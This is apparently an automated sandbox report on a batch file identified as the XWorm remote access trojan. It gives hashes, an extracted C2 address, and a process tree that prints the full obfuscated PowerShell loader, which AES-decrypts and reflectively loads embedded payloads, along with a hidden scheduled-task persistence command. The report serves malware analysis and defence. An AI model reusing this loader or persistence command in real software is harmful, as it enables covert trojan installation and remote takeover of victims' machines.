Overview

overview

10

Static

static

1

aimbotfr stub.bat

windows7-x64

8

aimbotfr stub.bat

windows10-2004-x64

10

aimbotfr stub.bat

windows10-ltsc 2021-x64

10

aimbotfr stub.bat

windows11-21h2-x64

10

Analysis

  • max time kernel
    90s
  • max time network
    100s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    15-11-2024 21:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    aimbotfr stub.bat

  • Size

    478KB

  • MD5

    09c4764995d1f2e96d0a228743f2425e

  • SHA1

    0a755c43e147141ec0e9d96d243765af66d1e8a0

  • SHA256

    c4db1679718dfb67fb33fcedced456035056f41b68fc071379d27d8bd708e6ab

  • SHA512

    856759d72b6fff895d336acb8f86ac82ad8560f5229c1cd12baf25bf6ea9ee80035d364c69c00e66bbe9678f788a635f837032a92d3f08008a8343dcc992ff6e

  • SSDEEP

    6144:Y5uDX7kLnB9tGFQe+6YRAFcqLw7DT8ZUXtk9clnD:Yo8LB2FQh64AFcqLw7kZ+uInD

Score
10/10
xwormexecutionrattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

80.76.49.227:9999

Mutex

g0vzRORqzebeaKQj

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\aimbotfr stub.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2908
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4pr42IAhLNXaMsLDATuTCXnSN37MkzjWlGCxvlpI204='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mUAA0rhmn7r0Y49Br4h9Tg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NWFXD=New-Object System.IO.MemoryStream(,$param_var); $TWFke=New-Object System.IO.MemoryStream; $XkRIU=New-Object System.IO.Compression.GZipStream($NWFXD, [IO.Compression.CompressionMode]::Decompress); $XkRIU.CopyTo($TWFke); $XkRIU.Dispose(); $NWFXD.Dispose(); $TWFke.Dispose(); $TWFke.ToArray();}function execute_function($param_var,$param2_var){ $SgoJi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $obVxl=$SgoJi.EntryPoint; $obVxl.Invoke($null, $param2_var);}$HAian = 'C:\Users\Admin\AppData\Local\Temp\aimbotfr stub.bat';$host.UI.RawUI.WindowTitle = $HAian;$jwIhR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HAian).Split([Environment]::NewLine);foreach ($fbsbe in $jwIhR) { if ($fbsbe.StartsWith(':: ')) { $Eaalc=$fbsbe.Substring(3); break; }}$payloads_var=[string[]]$Eaalc.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3144
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_648_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_648.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2800
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_648.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1864
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_648.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1664
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4pr42IAhLNXaMsLDATuTCXnSN37MkzjWlGCxvlpI204='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mUAA0rhmn7r0Y49Br4h9Tg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NWFXD=New-Object System.IO.MemoryStream(,$param_var); $TWFke=New-Object System.IO.MemoryStream; $XkRIU=New-Object System.IO.Compression.GZipStream($NWFXD, [IO.Compression.CompressionMode]::Decompress); $XkRIU.CopyTo($TWFke); $XkRIU.Dispose(); $NWFXD.Dispose(); $TWFke.Dispose(); $TWFke.ToArray();}function execute_function($param_var,$param2_var){ $SgoJi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $obVxl=$SgoJi.EntryPoint; $obVxl.Invoke($null, $param2_var);}$HAian = 'C:\Users\Admin\AppData\Roaming\startup_str_648.bat';$host.UI.RawUI.WindowTitle = $HAian;$jwIhR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HAian).Split([Environment]::NewLine);foreach ($fbsbe in $jwIhR) { if ($fbsbe.StartsWith(':: ')) { $Eaalc=$fbsbe.Substring(3); break; }}$payloads_var=[string[]]$Eaalc.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3584
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4F54.tmp.bat""
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3792
              • C:\Windows\system32\timeout.exe
                timeout 3
                7⤵
                • Delays execution with timeout.exe
                PID:4988

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    df472dcddb36aa24247f8c8d8a517bd7

    SHA1

    6f54967355e507294cbc86662a6fbeedac9d7030

    SHA256

    e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

    SHA512

    06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    824da05d0f31c23ab953467d7a3812f7

    SHA1

    48349c5986cb56777bf77e747eafbc2f87dfc2c1

    SHA256

    6d266b3c94b03d8ed8648328f707c58177b2075c963aff4cbe6576d93df518b8

    SHA512

    5c35ada146f86ebaefc96d82f7176f7ccabf179a5297b04fb7f56a88cb6a8a1b1bb159b04599cf8f581f49a08137530aa3cc8a1e5c67a383880c6998e84c5367

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4xqpr2v0.2ya.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\tmp4F54.tmp.bat
    Filesize

    171B

    MD5

    e66dbdd2705a4c83ed204fe1b850c5aa

    SHA1

    035c44923470fc89479b3c9f3c7a3c7c46552e8e

    SHA256

    e9583d73906dbb181d65637e00a343945b177a5981da0e3590a052fc31c7ffd0

    SHA512

    63b5d45a90386b108ce6b5a41e2429e4ace28d0800a09a609de5750b408323ef1bb78d37a90eeb531ea9a69c3cc3a773b0074876e5c70fc4e10f5ce70ab55b7c

    Download Submit

  • C:\Users\Admin\AppData\Roaming\startup_str_648.bat
    Filesize

    478KB

    MD5

    09c4764995d1f2e96d0a228743f2425e

    SHA1

    0a755c43e147141ec0e9d96d243765af66d1e8a0

    SHA256

    c4db1679718dfb67fb33fcedced456035056f41b68fc071379d27d8bd708e6ab

    SHA512

    856759d72b6fff895d336acb8f86ac82ad8560f5229c1cd12baf25bf6ea9ee80035d364c69c00e66bbe9678f788a635f837032a92d3f08008a8343dcc992ff6e

    Download Submit

  • C:\Users\Admin\AppData\Roaming\startup_str_648.vbs
    Filesize

    115B

    MD5

    b600bee856c2535ce776d86d5ea9bb62

    SHA1

    c8dda96c689116580b2599017c984f789bd32d49

    SHA256

    920d0b80773cb6d807162a2f54d5043904bdf6b957446b521523ce7ed8876a59

    SHA512

    89de565f01b7c150c5f96f9880f1040ce9f8bebba8d318929e9166f36c2bcd443b6b4261a0664cc5e4f95c07603bf723e1de4d80e39daa05fe1a451dd0ad410a

    Download Submit

  • memory/2800-26-0x00007FF9F7210000-0x00007FF9F7CD2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2800-27-0x00007FF9F7210000-0x00007FF9F7CD2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2800-16-0x00007FF9F7210000-0x00007FF9F7CD2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2800-25-0x00007FF9F7210000-0x00007FF9F7CD2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2800-30-0x00007FF9F7210000-0x00007FF9F7CD2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3144-13-0x00000217F55B0000-0x00000217F55B8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/3144-0-0x00007FF9F7213000-0x00007FF9F7215000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3144-14-0x00000217F5920000-0x00000217F5952000-memory.dmp

    Filesize

    200KB

    Download

  • memory/3144-12-0x00007FF9F7210000-0x00007FF9F7CD2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3144-11-0x00007FF9F7210000-0x00007FF9F7CD2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3144-6-0x00000217F5580000-0x00000217F55A2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3144-39-0x00007FF9F7210000-0x00007FF9F7CD2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3144-49-0x00007FF9F7210000-0x00007FF9F7CD2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3144-7-0x00007FF9F7210000-0x00007FF9F7CD2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3584-50-0x0000023471B90000-0x0000023471B9E000-memory.dmp

    Filesize

    56KB

    Download